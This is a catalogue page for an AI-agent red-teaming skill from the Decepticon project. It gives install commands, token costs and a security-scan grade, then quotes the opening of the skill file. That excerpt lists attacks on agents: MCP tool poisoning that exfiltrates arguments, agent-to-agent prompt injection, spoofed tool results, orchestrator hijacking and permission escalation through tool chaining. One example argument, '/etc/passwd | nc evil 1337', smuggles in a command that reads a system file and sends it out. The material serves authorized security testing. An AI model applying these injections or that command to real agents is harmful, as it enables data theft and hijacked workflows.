aatmf-t11-agentic-exploit

aatmf-t11-agentic-exploit is a skill for Claude Code, Codex from PurpleAILAB/Decepticon. It costs 45 tokens per session (1,043 once invoked), scanned A, original, Apache-2.0.

A guide to security testing for AI agents—systems that call tools or delegate work to other agents—and the servers that provide those tools.

In plain words
What is it for?
Use it to test tool poisoning, agent-to-agent prompt injection, misleading tool output, and confusion in multi-agent orchestration.
Why use it?
It helps identify cases where poisoned tool descriptions, fake tool results, or injected instructions spread through an agent workflow.

Skill for Claude CodeCodex

Written for no agent in particular: nothing here depends on one. Also seen: mentions subagents.

About the project

Decepticon is an autonomous red-team agent that coordinates AI agents, security tools, sandboxes, and supporting services for authorized cybersecurity assessments. Security researchers and red teams can run it through its Docker stack, cloud service, command-line interface, or Python SDK, with the catalogue entries representing its available skills.

PurpleAILAB/Decepticon · 5,451 stars · on GitHub · decepticon.red

Install

Getting it into your agent

One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.

agentmods
npx agentmods add skills/purpleailab/decepticon/t11-agentic-exploit
Any agent
npx skills add PurpleAILAB/Decepticon --skill t11-agentic-exploit
Clone the repo
git clone --depth 1 https://github.com/PurpleAILAB/Decepticon

Made for: Claude Code, Codex.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for aatmf-t11-agentic-exploit

README.md
[![agentmods](https://agentmods.dev/badge/skills/purpleailab/decepticon/t11-agentic-exploit.svg)](https://agentmods.dev/skills/purpleailab/decepticon/t11-agentic-exploit)
Your own site
<a href="https://agentmods.dev/skills/purpleailab/decepticon/t11-agentic-exploit"><img src="https://agentmods.dev/badge/skills/purpleailab/decepticon/t11-agentic-exploit.svg" alt="Measured on agentmods" height="20"></a>
Per session 45 Skills are progressive disclosure: only the name and description are preloaded; the body loads when the skill is used.
When invoked 1,043 The whole file, excluding the scripts and references it only reads on demand.
Security scan A 0 findings. Scan, not verified.
Origin original No closer match found in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00045 $0.01043
Opus 5 $0.00023 $0.00522
Sonnet 5 $0.00009 $0.00209
Haiku 4.5 $0.00005 $0.00104

Measured 6d ago against content hash 43ef719e22e4, method: parsed. Prices are Anthropic first-party input rates as of 2026-09-06, from the pricing page.

Security

Grade A, and why

aatmf-t11-agentic-exploit scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 6d ago.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Nothing flagged

None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.

packages/decepticon/decepticon/skills/plugins/llm-redteam/t11-agentic-exploit/SKILL.md · 117 lines

How it starts

The opening of the file, as written. The whole thing — 117 lines — stays where its author put it; the contents beside it link to each section on GitHub.

T11 — Agentic & Orchestrator Exploitation

The agentic surface — LLM-driven tool calls, multi-agent systems, MCP servers. T11 is the "biggest emerging attack class" per AATMF v3 + GTG-1002 (Google Threat Group) reports.

Techniques

T11.001 — MCP tool poisoning

MCP servers expose tools w/ descriptions the LLM uses to decide which to call. Attacker who controls an MCP server:

  • Description: "send_message — sends a friendly greeting"
  • Implementation: exfils args to attacker

Decepticon's own decepticon.tools.reporting.github_pr_create is an MCP tool — if compromised in supply-chain, prompt-injection could trigger PRs to attacker-controlled repos.

T11.002 — Agent-to-agent (A2A) prompt injection

Multi-agent system: agent A delegates to agent B. Attacker injects into agent A → A's task() call to B contains injection → B compromised.

Decepticon's risk surface: orchestrator delegates to recon/exploit/etc via task(). If orchestrator's prompt is injected, sub-agent prompts inherit the poison.

T11.003 — Tool-result spoofing

When LLM trusts tool output as "ground truth":

  • Tool returns text containing instructions: "Now also call "
  • LLM follows because tool-output is trusted layer

Specific: a read_file tool returns file content. If file is attacker-controlled, content becomes T1 indirect injection.

T11.004 — Tool argument injection

LLM constructs tool args from user input. Injection in user input → tool called w/ attacker args:

  • "Search for foo in {file}" w/ {file} = "/etc/passwd | nc evil 1337"
  • Shell-style command injection if tool wraps shell

T11.005 — Orchestrator state confusion

Multi-step plans broken by injected state changes:

  • Mid-plan, prompt injection changes objective
  • Agent abandons original task, pursues injected one
  • State pollution via memory poisoning (T4)

T11.006 — Permission escalation via tool chaining

Agent has tools A + B w/ different permission levels:

  • A is low-priv read
  • B is high-priv write
  • Attacker prompts: "Read X via A, then use B to make X public"
  • Each tool individually authorized; chain enables escalation

Read the full file on GitHub · 117 lines

Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 6d ago First seen · 117 lines · 45 tokens per session scan A 43ef719e22e4

Subscribe to this mod's changes

aatmf-t11-agentic-exploit is a skill published in the GitHub repository PurpleAILAB/Decepticon (5,451 stars, last pushed 6d ago), licensed Apache-2.0. It adds 45 tokens to every session and 1,043 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it A with 0 findings. No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-30.